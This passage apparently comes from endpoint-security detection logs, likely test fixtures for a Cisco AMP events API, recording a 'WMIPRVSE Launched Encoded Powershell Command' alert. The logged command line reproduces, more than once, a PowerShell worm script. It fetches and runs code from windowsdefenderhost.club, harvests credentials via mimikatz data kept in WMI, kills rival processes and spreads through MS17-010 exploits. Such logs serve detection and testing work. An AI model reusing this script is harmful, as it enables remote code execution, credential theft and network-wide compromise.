 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) ","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell 
Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) "],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
